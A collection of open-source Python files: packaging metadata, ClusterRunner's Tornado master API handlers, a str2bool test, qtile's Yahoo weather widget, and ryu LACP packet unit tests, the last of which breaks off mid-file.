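#           if formatter.match(headers, content_type):
#               try:
#                   return call(formatter, body)
#               except Exception:
#                   return default(body)
#       return default(body)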
|
mit
|
yrizk/django-blog
|
blogvenv/lib/python3.4/site-packages/pkg_resources/_vendor/packaging/__about__.py
|
257
|
1073
|
# Copyright 2014 Donald Stufft
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
]
__title__ = "packaging"
__summary__ = "Core utilities for Python packages"
__uri__ = "https://github.com/pypa/packaging"
__version__ = "15.0"
__author__ = "Donald Stufft"
__email__ = "[email protected]"
__license__ = "Apache License, Version 2.0"
__copyright__ = "Copyright 2014 %s" % __author__
|
apache-2.0
|
box/ClusterRunner
|
app/web_framework/cluster_master_application.py
|
1
|
18073
|
import http.client
import os
import urllib.parse
import tornado.web
import prometheus_client
from app.master.slave import SlaveRegistry
from app.util import analytics
from app.util import log
from app.util.conf.configuration import Configuration
from app.util.decorators import authenticated
from app.util.exceptions import ItemNotFoundError
from app.util.url_builder import UrlBuilder
from app.web_framework.cluster_application import ClusterApplication
from app.web_framework.cluster_base_handler import ClusterBaseAPIHandler, ClusterBaseHandler
from app.web_framework.route_node import RouteNode
# pylint: disable=attribute-defined-outside-init
# Handler classes are not designed to have __init__ overridden.
class ClusterMasterApplication(ClusterApplication):
def __init__(self, cluster_master):
"""
:type cluster_master: app.master.cluster_master.ClusterMaster
"""
default_params = {
'cluster_master': cluster_master,
}
# The routes are described using a tree structure. This is a better representation of a path than a flat list
# of strings and allows us to inspect children/parents of a node to generate 'child routes'
api_v1 = [
RouteNode(r'v1', _APIVersionOneHandler).add_children([
RouteNode(r'metrics', _MetricsHandler),
RouteNode(r'version', _VersionHandler),
RouteNode(r'build', _BuildsHandler, 'builds').add_children([
RouteNode(r'(\d+)', _BuildHandler, 'build').add_children([
RouteNode(r'result', _BuildResultRedirectHandler),
RouteNode(r'artifacts.tar.gz', _BuildTarResultHandler),
RouteNode(r'artifacts.zip', _BuildZipResultHandler),
RouteNode(r'subjob', _SubjobsHandler, 'subjobs').add_children([
RouteNode(r'(\d+)', _SubjobHandler, 'subjob').add_children([
RouteNode(r'atom', _AtomsHandler, 'atoms').add_children([
RouteNode(r'(\d+)', _AtomHandler, 'atom').add_children([
RouteNode(r'console', _AtomConsoleHandler),
]),
]),
RouteNode(r'result', _SubjobResultHandler),
]),
]),
]),
]),
RouteNode(r'queue', _QueueHandler),
RouteNode(r'slave', _SlavesHandler, 'slaves').add_children([
RouteNode(r'(\d+)', _SlaveHandler, 'slave').add_children([
RouteNode(r'shutdown', _SlaveShutdownHandler, 'shutdown'),
RouteNode(r'heartbeat', _SlavesHeartbeatHandler),
]),
RouteNode(r'shutdown', _SlavesShutdownHandler, 'shutdown'),
]),
RouteNode(r'eventlog', _EventlogHandler)])]
api_v2 = [
RouteNode(r'metrics', _MetricsHandler),
RouteNode(r'version', _VersionHandler),
RouteNode(r'builds', _V2BuildsHandler).add_children([
RouteNode(r'(\d+)', _BuildHandler, 'build').add_children([
RouteNode(r'result', _BuildResultRedirectHandler),
RouteNode(r'artifacts.tar.gz', _BuildTarResultHandler),
RouteNode(r'artifacts.zip', _BuildZipResultHandler),
                RouteNode(r'subjobs', _V2SubjobsHandler).add_children([
RouteNode(r'(\d+)', _SubjobHandler, 'subjob').add_children([
RouteNode(r'atoms', _V2AtomsHandler).add_children([
RouteNode(r'(\d+)', _AtomHandler, 'atom').add_children([
RouteNode(r'console', _AtomConsoleHandler),
]),
]),
RouteNode(r'result', _SubjobResultHandler),
]),
]),
]),
]),
RouteNode(r'queue', _QueueHandler),
RouteNode(r'slaves', _SlavesHandler).add_children([
RouteNode(r'(\d+)', _SlaveHandler, 'slave').add_children([
RouteNode(r'shutdown', _SlaveShutdownHandler),
RouteNode(r'heartbeat', _SlavesHeartbeatHandler),
]),
RouteNode(r'shutdown', _SlavesShutdownHandler),
]),
RouteNode(r'eventlog', _EventlogHandler)]
root = RouteNode(r'/', _RootHandler)
root.add_children(api_v1, version=1)
root.add_children(api_v2, version=2)
handlers = self.get_all_handlers(root, default_params)
super().__init__(handlers)
class _ClusterMasterBaseAPIHandler(ClusterBaseAPIHandler):
def initialize(self, route_node=None, cluster_master=None):
"""
:type route_node: RouteNode
:type cluster_master: app.master.cluster_master.ClusterMaster
"""
self._logger = log.get_logger(__name__)
self._cluster_master = cluster_master
super().initialize(route_node)
class _RootHandler(_ClusterMasterBaseAPIHandler):
pass
class _APIVersionOneHandler(_ClusterMasterBaseAPIHandler):
def get(self):
response = {
'master': self._cluster_master.api_representation(),
}
self.write(response)
class _VersionHandler(_ClusterMasterBaseAPIHandler):
def get(self):
response = {
'version': Configuration['version'],
'api_version': self.api_version,
}
self.write(response)
class _MetricsHandler(_ClusterMasterBaseAPIHandler):
def get(self):
self.write_text(prometheus_client.exposition.generate_latest(prometheus_client.core.REGISTRY))
class _QueueHandler(_ClusterMasterBaseAPIHandler):
def get(self):
response = {
'queue': [build.api_representation() for build in self._cluster_master.active_builds()]
}
self.write(response)
class _SubjobsHandler(_ClusterMasterBaseAPIHandler):
def get(self, build_id):
build = self._cluster_master.get_build(int(build_id))
response = {
'subjobs': [subjob.api_representation() for subjob in build.get_subjobs()]
}
self.write(response)
class _V2SubjobsHandler(_SubjobsHandler):
def get(self, build_id):
offset, limit = self.get_pagination_params()
build = self._cluster_master.get_build(int(build_id))
response = {
'subjobs': [subjob.api_representation() for subjob in build.get_subjobs(offset, limit)]
}
self.write(response)
class _SubjobHandler(_ClusterMasterBaseAPIHandler):
def get(self, build_id, subjob_id):
build = self._cluster_master.get_build(int(build_id))
subjob = build.subjob(int(subjob_id))
response = {
'subjob': subjob.api_representation()
}
self.write(response)
class _SubjobResultHandler(_ClusterMasterBaseAPIHandler):
def post(self, build_id, subjob_id):
slave_url = self.decoded_body.get('slave')
slave = SlaveRegistry.singleton().get_slave(slave_url=slave_url)
file_payload = self.request.files.get('file')
if not file_payload:
raise RuntimeError('Result file not provided')
slave_executor_id = self.decoded_body.get('metric_data', {}).get('executor_id')
analytics.record_event(analytics.MASTER_RECEIVED_RESULT, executor_id=slave_executor_id, build_id=int(build_id),
subjob_id=int(subjob_id), slave_id=slave.id)
self._cluster_master.handle_result_reported_from_slave(
slave_url, int(build_id), int(subjob_id), file_payload[0])
self._write_status()
def get(self, build_id, subjob_id):
# TODO: return the subjob's result archive here?
self.write({'status': 'not implemented'})
class _AtomsHandler(_ClusterMasterBaseAPIHandler):
def get(self, build_id, subjob_id):
build = self._cluster_master.get_build(int(build_id))
subjob = build.subjob(int(subjob_id))
response = {
'atoms': [atom.api_representation() for atom in subjob.atoms()],
}
self.write(response)
class _V2AtomsHandler(_AtomsHandler):
def get(self, build_id, subjob_id):
offset, limit = self.get_pagination_params()
build = self._cluster_master.get_build(int(build_id))
subjob = build.subjob(int(subjob_id))
response = {
'atoms': [atom.api_representation() for atom in subjob.get_atoms(offset, limit)],
}
self.write(response)
class _AtomHandler(_ClusterMasterBaseAPIHandler):
def get(self, build_id, subjob_id, atom_id):
build = self._cluster_master.get_build(int(build_id))
subjob = build.subjob(int(subjob_id))
atoms = subjob.atoms
response = {
'atom': atoms[int(atom_id)].api_representation(),
}
self.write(response)
class _AtomConsoleHandler(_ClusterMasterBaseAPIHandler):
def get(self, build_id, subjob_id, atom_id):
"""
:type build_id: int
:type subjob_id: int
:type atom_id: int
"""
max_lines = int(self.get_query_argument('max_lines', 50))
offset_line = self.get_query_argument('offset_line', None)
if offset_line is not None:
offset_line = int(offset_line)
try:
response = self._cluster_master.get_console_output(
build_id,
subjob_id,
atom_id,
Configuration['results_directory'],
max_lines,
offset_line
)
self.write(response)
return
except ItemNotFoundError as e:
# If the master doesn't have the atom's console output, it's possible it's currently being worked on,
# in which case the slave that is working on it may be able to provide the in-progress console output.
build = self._cluster_master.get_build(int(build_id))
subjob = build.subjob(int(subjob_id))
slave = subjob.slave
if slave is None:
raise e
api_url_builder = UrlBuilder(slave.url)
slave_console_url = api_url_builder.url('build', build_id, 'subjob', subjob_id, 'atom', atom_id, 'console')
query = {'max_lines': max_lines}
if offset_line is not None:
query['offset_line'] = offset_line
query_string = urllib.parse.urlencode(query)
self.redirect('{}?{}'.format(slave_console_url, query_string))
class _BuildsHandler(_ClusterMasterBaseAPIHandler):
@authenticated
def post(self):
build_params = self.decoded_body
success, response = self._cluster_master.handle_request_for_new_build(build_params)
status_code = http.client.ACCEPTED if success else http.client.BAD_REQUEST
self._write_status(response, success, status_code=status_code)
def get(self):
response = {
'builds': [build.api_representation() for build in self._cluster_master.get_builds()]
}
self.write(response)
class _V2BuildsHandler(_BuildsHandler):
def get(self):
offset, limit = self.get_pagination_params()
response = {
'builds': [build.api_representation() for build in self._cluster_master.get_builds(offset, limit)]
}
self.write(response)
class _BuildHandler(_ClusterMasterBaseAPIHandler):
@authenticated
def put(self, build_id):
update_params = self.decoded_body
success, response = self._cluster_master.handle_request_to_update_build(build_id, update_params)
status_code = http.client.OK if success else http.client.BAD_REQUEST
self._write_status(response, success, status_code=status_code)
def get(self, build_id):
response = {
'build': self._cluster_master.get_build(int(build_id)).api_representation(),
}
self.write(response)
class _BuildResultRedirectHandler(_ClusterMasterBaseAPIHandler):
"""
Redirect to the actual build results file download URL.
"""
def get(self, build_id):
self.redirect('/v1/build/{}/artifacts.tar.gz'.format(build_id))
class _BuildResultHandler(ClusterBaseHandler, tornado.web.StaticFileHandler):
"""
Download an artifact for the specified build. Note this class inherits from ClusterBaseHandler and
StaticFileHandler, so the semantics of this handler are a bit different than the other handlers in this file that
inherit from _ClusterMasterBaseHandler.
From the Tornado docs: "for heavy traffic it will be more efficient to use a dedicated static file server".
"""
def initialize(self, route_node=None, cluster_master=None):
"""
:param route_node: This is not used, it is only a param so we can pass route_node to all handlers without error.
In other routes, route_node is used to find child routes but filehandler routes will never show child routes.
:type route_node: RouteNode | None
:type cluster_master: app.master.cluster_master.ClusterMaster | None
"""
self._cluster_master = cluster_master
super().initialize(path=None) # we will not set the root path until the get() method is called
def get(self, build_id):
artifact_file_path = self.get_result_file_download_path(int(build_id))
self.root, artifact_filename = os.path.split(artifact_file_path)
self.set_header('Content-Type', 'application/octet-stream') # this should be downloaded as a binary file
return super().get(path=artifact_filename)
def get_result_file_download_path(self, build_id: int):
raise NotImplementedError
class _BuildTarResultHandler(_BuildResultHandler):
"""Handler for the tar archive file"""
def get_result_file_download_path(self, build_id: int):
"""Get the file path to the artifacts.tar.gz for the specified build."""
return self._cluster_master.get_path_for_build_results_archive(build_id, is_tar_request=True)
class _BuildZipResultHandler(_BuildResultHandler):
"""Handler for the zip archive file"""
def get_result_file_download_path(self, build_id: int):
"""Get the file path to the artifacts.zip for the specified build."""
return self._cluster_master.get_path_for_build_results_archive(build_id)
class _SlavesHandler(_ClusterMasterBaseAPIHandler):
def post(self):
slave_url = self.decoded_body.get('slave')
num_executors = int(self.decoded_body.get('num_executors'))
session_id = self.decoded_body.get('session_id')
response = self._cluster_master.connect_slave(slave_url, num_executors, session_id)
self._write_status(response, status_code=201)
def get(self):
response = {
'slaves': [slave.api_representation() for slave in SlaveRegistry.singleton().get_all_slaves_by_id().values()]
}
self.write(response)
class _SlaveHandler(_ClusterMasterBaseAPIHandler):
def get(self, slave_id):
slave = SlaveRegistry.singleton().get_slave(slave_id=int(slave_id))
response = {
'slave': slave.api_representation()
}
self.write(response)
@authenticated
def put(self, slave_id):
new_slave_state = self.decoded_body.get('slave', {}).get('state')
slave = SlaveRegistry.singleton().get_slave(slave_id=int(slave_id))
self._cluster_master.handle_slave_state_update(slave, new_slave_state)
self._cluster_master.update_slave_last_heartbeat_time(slave)
self._write_status({
'slave': slave.api_representation()
})
class _EventlogHandler(_ClusterMasterBaseAPIHandler):
def get(self):
# all arguments are optional, so default to None
since_timestamp = self.get_query_argument('since_timestamp', None)
since_id = self.get_query_argument('since_id', None)
self.write({
'events': analytics.get_events(since_timestamp, since_id),
})
class _SlaveShutdownHandler(_ClusterMasterBaseAPIHandler):
@authenticated
def post(self, slave_id):
slaves_to_shutdown = [int(slave_id)]
self._cluster_master.set_shutdown_mode_on_slaves(slaves_to_shutdown)
class _SlavesShutdownHandler(_ClusterMasterBaseAPIHandler):
@authenticated
def post(self):
shutdown_all = self.decoded_body.get('shutdown_all')
if shutdown_all:
slaves_to_shutdown = SlaveRegistry.singleton().get_all_slaves_by_id().keys()
else:
slaves_to_shutdown = [int(slave_id) for slave_id in self.decoded_body.get('slaves')]
self._cluster_master.set_shutdown_mode_on_slaves(slaves_to_shutdown)
class _SlavesHeartbeatHandler(_ClusterMasterBaseAPIHandler):
@authenticated
def post(self, slave_id):
slave = SlaveRegistry.singleton().get_slave(slave_id=int(slave_id))
        # If the slave has been marked dead but still sends a heartbeat, the master does not update the last
        # heartbeat time and the method returns False. Additionally, the master responds to the slave with the
        # slave's status. The slave treats an is_alive=False response as a heartbeat failure, and dies.
        #
        # The reason the master returns the status to the slave instead of simply marking the slave as alive is
        # that neither the master nor the slave maintains explicit state about when and why the slave was marked
        # dead. It is a lot cleaner for the heartbeat functionality to indicate a heartbeat failure and let the
        # slave make a decision based on that.
is_alive = self._cluster_master.update_slave_last_heartbeat_time(slave)
self.write({'is_alive': is_alive})
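# Illustrative sketch (not ClusterRunner's actual implementation): the RouteNode
# tree declared in ClusterMasterApplication is flattened into Tornado handler
# specs by ClusterApplication.get_all_handlers; a depth-first walk along these
# lines would produce (url_pattern, handler_class, params) tuples.  The
# attribute names (regex, handler, children) are assumptions.
#
#   def _flatten_routes(node, prefix, default_params):
#       pattern = (prefix.rstrip('/') + '/' + node.regex) if prefix else node.regex
#       specs = [(pattern + '/?', node.handler, dict(default_params, route_node=node))]
#       for child in node.children:
#           specs.extend(_flatten_routes(child, pattern, default_params))
#       return specs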
|
apache-2.0
|
overtherain/scriptfile
|
software/googleAppEngine/lib/grizzled/grizzled/test/text/TestStr2Bool.py
|
19
|
1741
|
#!/usr/bin/python2.4
# $Id: 99b27c0fb42453577338855a901665a65a027dd4 $
#
# Nose program for testing grizzled.file classes/functions
# ---------------------------------------------------------------------------
# Imports
# ---------------------------------------------------------------------------
import google3
from grizzled.text import str2bool
# ---------------------------------------------------------------------------
# Globals
# ---------------------------------------------------------------------------
# ---------------------------------------------------------------------------
# Classes
# ---------------------------------------------------------------------------
class TestStr2Bool(object):
def testGoodStrings(self):
for s, expected in (('false', False,),
('true', True,),
('f', False,),
('t', True,),
('no', False,),
('yes', True,),
                            ('n', False,),
                            ('y', True,),
('0', False,),
('1', True,)):
for s2 in (s, s.upper(), s.capitalize()):
val = str2bool(s2)
print '"%s" -> %s. Expected=%s' % (s2, expected, val)
assert val == expected, \
'"%s" does not produce expected %s' % (s2, expected)
def testBadStrings(self):
for s in ('foo', 'bar', 'xxx', 'yyy', ''):
try:
str2bool(s)
assert False, 'Expected "%s" to produce an exception' % s
except ValueError:
pass
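# Illustrative usage (derived from the cases exercised above; not part of the
# test module):
#
#     from grizzled.text import str2bool
#     str2bool('Yes')    # -> True   (matching is case-insensitive)
#     str2bool('0')      # -> False
#     str2bool('maybe')  # raises ValueError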
|
mit
|
kiniou/qtile
|
libqtile/widget/yahoo_weather.py
|
2
|
5080
|
# -*- coding:utf-8 -*-
# Copyright (c) 2011-2012 dmpayton
# Copyright (c) 2011 Kenji_Takahashi
# Copyright (c) 2011 Mounier Florian
# Copyright (c) 2012, 2014-2015 Tycho Andersen
# Copyright (c) 2013 David R. Andersen
# Copyright (c) 2013 Tao Sauvage
# Copyright (c) 2014 Sean Vig
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# -*- coding: utf-8 -*-
from .generic_poll_text import GenPollUrl
from xml.dom import minidom
from six.moves.urllib.parse import urlencode
QUERY_URL = 'http://query.yahooapis.com/v1/public/yql?'
WEATHER_URL = 'http://weather.yahooapis.com/forecastrss?'
WEATHER_NS = 'http://xml.weather.yahoo.com/ns/rss/1.0'
class YahooWeather(GenPollUrl):
''' A weather widget, data provided by the Yahoo! Weather API
Format options:
- astronomy_sunrise
- astronomy_sunset
- atmosphere_humidity
- atmosphere_visibility
- atmosphere_pressure
- atmosphere_rising
- condition_text
- condition_code
- condition_temp
- condition_date
- location_city
- location_region
- location_country
- units_temperature
- units_distance
- units_pressure
- units_speed
- wind_chill
'''
defaults = [
# One of (location, woeid) must be set.
(
'location',
None,
'Location to fetch weather for. Ignored if woeid is set.'
),
(
'woeid',
None,
'Where On Earth ID. Auto-calculated if location is set.'
),
(
'format',
'{location_city}: {condition_temp} °{units_temperature}',
'Display format'
),
('metric', True, 'True to use metric/C, False to use imperial/F'),
('up', '^', 'symbol for rising atmospheric pressure'),
('down', 'v', 'symbol for falling atmospheric pressure'),
('steady', 's', 'symbol for steady atmospheric pressure'),
]
json = False
def __init__(self, **config):
GenPollUrl.__init__(self, **config)
self.add_defaults(YahooWeather.defaults)
self._url = None
def fetch_woeid(self, location):
url = QUERY_URL + urlencode({
'q': 'select woeid from geo.places where text="%s"' % location,
'format': 'json'
})
data = self.fetch(url)
if data['query']['count'] > 1:
return data['query']['results']['place'][0]['woeid']
return data['query']['results']['place']['woeid']
@property
def url(self):
if self._url:
return self._url
if not self.woeid:
if self.location:
self.woeid = self.fetch_woeid(self.location)
if not self.woeid:
return None
format = 'c' if self.metric else 'f'
self._url = WEATHER_URL + urlencode({'w': self.woeid, 'u': format})
return self._url
def parse(self, body):
dom = minidom.parseString(body)
structure = (
('location', ('city', 'region', 'country')),
('units', ('temperature', 'distance', 'pressure', 'speed')),
('wind', ('chill', 'direction', 'speed')),
('atmosphere', ('humidity', 'visibility', 'pressure', 'rising')),
('astronomy', ('sunrise', 'sunset')),
('condition', ('text', 'code', 'temp', 'date'))
)
data = {}
for tag, attrs in structure:
element = dom.getElementsByTagNameNS(WEATHER_NS, tag)[0]
for attr in attrs:
data['%s_%s' % (tag, attr)] = element.getAttribute(attr)
if data['atmosphere_rising'] == '0':
data['atmosphere_rising'] = self.steady
elif data['atmosphere_rising'] == '1':
data['atmosphere_rising'] = self.up
elif data['atmosphere_rising'] == '2':
data['atmosphere_rising'] = self.down
return self.format.format(**data)
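# Illustrative configuration sketch (not part of the widget): in a qtile config
# the widget would typically be placed in a bar, with either `location` or
# `woeid` set, e.g.
#
#   widget.YahooWeather(location='Dublin, IE',
#                       format='{location_city}: {condition_temp} °{units_temperature}')
#
# The format string may use any of the keys listed in the class docstring above.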
|
mit
|
torufuru/oolhackathon
|
ryu/tests/unit/packet/test_slow.py
|
29
|
45511
|
# Copyright (C) 2013 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# vim: tabstop=4 shiftwidth=4 softtabstop=4
import unittest
import logging
import copy
from struct import pack, unpack_from
from nose.tools import ok_, eq_, raises
from ryu.ofproto import ether
from ryu.lib.packet.ethernet import ethernet
from ryu.lib.packet.packet import Packet
from ryu.lib import addrconv
from ryu.lib.packet.slow import slow, lacp
from ryu.lib.packet.slow import SLOW_PROTOCOL_MULTICAST
from ryu.lib.packet.slow import SLOW_SUBTYPE_LACP
from ryu.lib.packet.slow import SLOW_SUBTYPE_MARKER
LOG = logging.getLogger(__name__)
class Test_slow(unittest.TestCase):
""" Test case for Slow Protocol
"""
def setUp(self):
self.subtype = SLOW_SUBTYPE_LACP
self.version = lacp.LACP_VERSION_NUMBER
self.actor_tag = lacp.LACP_TLV_TYPE_ACTOR
self.actor_length = 20
self.actor_system_priority = 65534
self.actor_system = '00:07:0d:af:f4:54'
self.actor_key = 1
self.actor_port_priority = 65535
self.actor_port = 1
self.actor_state_activity = lacp.LACP_STATE_ACTIVE
self.actor_state_timeout = lacp.LACP_STATE_LONG_TIMEOUT
self.actor_state_aggregation = lacp.LACP_STATE_AGGREGATEABLE
self.actor_state_synchronization = lacp.LACP_STATE_IN_SYNC
self.actor_state_collecting = lacp.LACP_STATE_COLLECTING_ENABLED
self.actor_state_distributing = lacp.LACP_STATE_DISTRIBUTING_ENABLED
self.actor_state_defaulted = lacp.LACP_STATE_OPERATIONAL_PARTNER
self.actor_state_expired = lacp.LACP_STATE_EXPIRED
self.actor_state = (
(self.actor_state_activity << 0) |
(self.actor_state_timeout << 1) |
(self.actor_state_aggregation << 2) |
(self.actor_state_synchronization << 3) |
(self.actor_state_collecting << 4) |
(self.actor_state_distributing << 5) |
(self.actor_state_defaulted << 6) |
(self.actor_state_expired << 7))
self.partner_tag = lacp.LACP_TLV_TYPE_PARTNER
self.partner_length = 20
self.partner_system_priority = 0
self.partner_system = '00:00:00:00:00:00'
self.partner_key = 0
self.partner_port_priority = 0
self.partner_port = 0
self.partner_state_activity = 0
self.partner_state_timeout = lacp.LACP_STATE_SHORT_TIMEOUT
self.partner_state_aggregation = 0
self.partner_state_synchronization = 0
self.partner_state_collecting = 0
self.partner_state_distributing = 0
self.partner_state_defaulted = 0
self.partner_state_expired = 0
self.partner_state = (
(self.partner_state_activity << 0) |
(self.partner_state_timeout << 1) |
(self.partner_state_aggregation << 2) |
(self.partner_state_synchronization << 3) |
(self.partner_state_collecting << 4) |
(self.partner_state_distributing << 5) |
(self.partner_state_defaulted << 6) |
(self.partner_state_expired << 7))
self.collector_tag = lacp.LACP_TLV_TYPE_COLLECTOR
self.collector_length = 16
self.collector_max_delay = 0
self.terminator_tag = lacp.LACP_TLV_TYPE_TERMINATOR
self.terminator_length = 0
self.head_fmt = lacp._HLEN_PACK_STR
self.head_len = lacp._HLEN_PACK_LEN
self.act_fmt = lacp._ACTPRT_INFO_PACK_STR
self.act_len = lacp._ACTPRT_INFO_PACK_LEN
self.prt_fmt = lacp._ACTPRT_INFO_PACK_STR
self.prt_len = lacp._ACTPRT_INFO_PACK_LEN
self.col_fmt = lacp._COL_INFO_PACK_STR
self.col_len = lacp._COL_INFO_PACK_LEN
self.trm_fmt = lacp._TRM_PACK_STR
self.trm_len = lacp._TRM_PACK_LEN
self.length = lacp._ALL_PACK_LEN
self.head_buf = pack(self.head_fmt,
self.subtype,
self.version)
self.act_buf = pack(self.act_fmt,
self.actor_tag,
self.actor_length,
self.actor_system_priority,
                            addrconv.mac.text_to_bin(self.actor_system),
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state)
self.prt_buf = pack(self.prt_fmt,
self.partner_tag,
self.partner_length,
self.partner_system_priority,
                            addrconv.mac.text_to_bin(self.partner_system),
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state)
self.col_buf = pack(self.col_fmt,
self.collector_tag,
self.collector_length,
self.collector_max_delay)
self.trm_buf = pack(self.trm_fmt,
self.terminator_tag,
self.terminator_length)
self.buf = self.head_buf + self.act_buf + self.prt_buf + \
self.col_buf + self.trm_buf
def tearDown(self):
pass
def test_parser(self):
slow.parser(self.buf)
def test_not_implemented_subtype(self):
not_implemented_buf = str(SLOW_SUBTYPE_MARKER) + self.buf[1:]
(instance, nexttype, last) = slow.parser(not_implemented_buf)
assert None == instance
assert None == nexttype
assert None != last
def test_invalid_subtype(self):
invalid_buf = "\xff" + self.buf[1:]
(instance, nexttype, last) = slow.parser(invalid_buf)
assert None == instance
assert None == nexttype
assert None != last
class Test_lacp(unittest.TestCase):
""" Test case for lacp
"""
def setUp(self):
self.subtype = SLOW_SUBTYPE_LACP
self.version = lacp.LACP_VERSION_NUMBER
self.actor_tag = lacp.LACP_TLV_TYPE_ACTOR
self.actor_length = 20
self.actor_system_priority = 65534
self.actor_system = '00:07:0d:af:f4:54'
self.actor_key = 1
self.actor_port_priority = 65535
self.actor_port = 1
self.actor_state_activity = lacp.LACP_STATE_ACTIVE
self.actor_state_timeout = lacp.LACP_STATE_LONG_TIMEOUT
self.actor_state_aggregation = lacp.LACP_STATE_AGGREGATEABLE
self.actor_state_synchronization = lacp.LACP_STATE_IN_SYNC
self.actor_state_collecting = lacp.LACP_STATE_COLLECTING_ENABLED
self.actor_state_distributing = lacp.LACP_STATE_DISTRIBUTING_ENABLED
self.actor_state_defaulted = lacp.LACP_STATE_OPERATIONAL_PARTNER
self.actor_state_expired = lacp.LACP_STATE_EXPIRED
self.actor_state = (
(self.actor_state_activity << 0) |
(self.actor_state_timeout << 1) |
(self.actor_state_aggregation << 2) |
(self.actor_state_synchronization << 3) |
(self.actor_state_collecting << 4) |
(self.actor_state_distributing << 5) |
(self.actor_state_defaulted << 6) |
(self.actor_state_expired << 7))
self.partner_tag = lacp.LACP_TLV_TYPE_PARTNER
self.partner_length = 20
self.partner_system_priority = 0
self.partner_system = '00:00:00:00:00:00'
self.partner_key = 0
self.partner_port_priority = 0
self.partner_port = 0
self.partner_state_activity = 0
self.partner_state_timeout = lacp.LACP_STATE_SHORT_TIMEOUT
self.partner_state_aggregation = 0
self.partner_state_synchronization = 0
self.partner_state_collecting = 0
self.partner_state_distributing = 0
self.partner_state_defaulted = 0
self.partner_state_expired = 0
self.partner_state = (
(self.partner_state_activity << 0) |
(self.partner_state_timeout << 1) |
(self.partner_state_aggregation << 2) |
(self.partner_state_synchronization << 3) |
(self.partner_state_collecting << 4) |
(self.partner_state_distributing << 5) |
(self.partner_state_defaulted << 6) |
(self.partner_state_expired << 7))
self.collector_tag = lacp.LACP_TLV_TYPE_COLLECTOR
self.collector_length = 16
self.collector_max_delay = 0
self.terminator_tag = lacp.LACP_TLV_TYPE_TERMINATOR
self.terminator_length = 0
self.head_fmt = lacp._HLEN_PACK_STR
self.head_len = lacp._HLEN_PACK_LEN
self.act_fmt = lacp._ACTPRT_INFO_PACK_STR
self.act_len = lacp._ACTPRT_INFO_PACK_LEN
self.prt_fmt = lacp._ACTPRT_INFO_PACK_STR
self.prt_len = lacp._ACTPRT_INFO_PACK_LEN
self.col_fmt = lacp._COL_INFO_PACK_STR
self.col_len = lacp._COL_INFO_PACK_LEN
self.trm_fmt = lacp._TRM_PACK_STR
self.trm_len = lacp._TRM_PACK_LEN
self.length = lacp._ALL_PACK_LEN
self.head_buf = pack(self.head_fmt,
self.subtype,
self.version)
self.act_buf = pack(self.act_fmt,
self.actor_tag,
self.actor_length,
self.actor_system_priority,
addrconv.mac.text_to_bin(self.actor_system),
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state)
self.prt_buf = pack(self.prt_fmt,
self.partner_tag,
self.partner_length,
self.partner_system_priority,
addrconv.mac.text_to_bin(self.partner_system),
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state)
self.col_buf = pack(self.col_fmt,
self.collector_tag,
self.collector_length,
self.collector_max_delay)
self.trm_buf = pack(self.trm_fmt,
self.terminator_tag,
self.terminator_length)
self.buf = self.head_buf + self.act_buf + self.prt_buf + \
self.col_buf + self.trm_buf
self.l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
def tearDown(self):
pass
def find_protocol(self, pkt, name):
for p in pkt.protocols:
if p.protocol_name == name:
return p
def test_init(self):
eq_(self.subtype, self.l._subtype)
eq_(self.version, self.l.version)
eq_(self.actor_tag, self.l._actor_tag)
eq_(self.actor_length, self.l._actor_length)
eq_(self.actor_system_priority, self.l.actor_system_priority)
eq_(self.actor_system, self.l.actor_system)
eq_(self.actor_key, self.l.actor_key)
eq_(self.actor_port_priority, self.l.actor_port_priority)
eq_(self.actor_port, self.l.actor_port)
eq_(self.actor_state_activity, self.l.actor_state_activity)
eq_(self.actor_state_timeout, self.l.actor_state_timeout)
eq_(self.actor_state_aggregation,
self.l.actor_state_aggregation)
eq_(self.actor_state_synchronization,
self.l.actor_state_synchronization)
eq_(self.actor_state_collecting,
